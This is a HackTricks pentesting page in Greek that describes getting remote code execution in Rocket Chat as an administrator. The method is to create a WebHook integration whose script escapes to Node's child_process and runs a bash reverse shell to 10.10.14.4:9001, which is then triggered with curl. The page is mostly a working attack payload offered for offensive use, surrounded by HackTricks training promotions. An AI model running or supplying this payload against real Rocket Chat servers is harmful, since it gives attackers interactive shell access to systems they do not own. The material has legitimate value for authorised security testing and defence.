Rocket Chat

Reading time: 2 minutes

tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

RCE

Αν είστε διαχειριστής μέσα στο Rocket Chat μπορείτε να αποκτήσετε RCE.

  • Πηγαίνετε στο Integrations και επιλέξτε New Integration και διαλέξτε οποιοδήποτε: Incoming WebHook ή Outgoing WebHook.
  • /admin/integrations/incoming
  • Σύμφωνα με τα docs, και οι δύο χρησιμοποιούν ES2015 / ECMAScript 6 (βασικά JavaScript) για να επεξεργαστούν τα δεδομένα. Έτσι, ας αποκτήσουμε ένα rev shell για javascript όπως:
javascript
const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • Ρυθμίστε το WebHook (το κανάλι και η ανάρτηση ως όνομα χρήστη πρέπει να υπάρχουν):
  • Ρυθμίστε το σενάριο WebHook:
  • Αποθηκεύστε τις αλλαγές
  • Αποκτήστε το παραγόμενο URL WebHook:
  • Καλέστε το με curl και θα πρέπει να λάβετε το rev shell

tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks